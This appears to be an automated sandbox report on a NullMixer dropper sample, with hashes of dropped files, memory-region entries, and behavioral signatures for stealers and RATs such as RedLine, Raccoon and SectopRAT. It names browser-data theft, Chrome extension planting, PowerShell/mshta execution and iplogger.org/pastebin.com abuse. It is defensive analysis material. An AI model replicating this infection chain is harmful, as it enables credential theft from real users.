SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe

MD5 6b4f4e37bc557393a93d254fe4626bf3
SHA1 b9950d0223789ae109b43308fcaf93cd35923edb
SHA256 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d
SHA512 a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e

memory/1784-132-0x00000000008D0000-0x0000000000942000-memory.dmp

memory/2256-133-0x0000000001080000-0x00000000010F0000-memory.dmp

memory/2416-137-0x0000000000F40000-0x0000000000F48000-memory.dmp

memory/2260-152-0x00000000003E0000-0x00000000003E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-2USU1.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

MD5 d165e339ef0c057e20eb61347d06d396
SHA1 cb508e60292616b22f2d7a5ab8f763e4c89cf448
SHA256 ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8
SHA512 da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580

memory/1520-181-0x0000000002730000-0x000000000288D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-2USU1.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2528-153-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1260-150-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/676-148-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2260-136-0x0000000000F80000-0x0000000000F96000-memory.dmp

memory/1424-131-0x0000000000A30000-0x0000000000AA0000-memory.dmp

memory/2528-128-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0944361c3621a67a6.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

memory/1520-182-0x0000000002B50000-0x0000000002BF6000-memory.dmp

memory/1520-186-0x0000000002C00000-0x0000000002C93000-memory.dmp

memory/1520-184-0x0000000002C00000-0x0000000002C93000-memory.dmp

memory/1520-183-0x0000000002C00000-0x0000000002C93000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

memory/1660-196-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1660-195-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1660-194-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1660-193-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1528-207-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1268-220-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1528-219-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1268-218-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1268-217-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1268-215-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1268-213-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1268-211-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1268-222-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1528-206-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1528-205-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1528-203-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1528-201-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1528-199-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1528-197-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1660-191-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1660-187-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09d761ab4704dd931.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

memory/2860-235-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2860-233-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2860-232-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2860-231-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2860-229-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2860-227-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2860-225-0x0000000000400000-0x0000000000422000-memory.dmp

memory/676-237-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1660-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1660-74-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1660-73-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1660-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1660-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1660-68-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1660-67-0x000000006494A000-0x000000006494F000-memory.dmp

memory/1660-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1660-65-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1660-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1660-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/1660-52-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c78ded4d176ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up geolocation information via web service

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
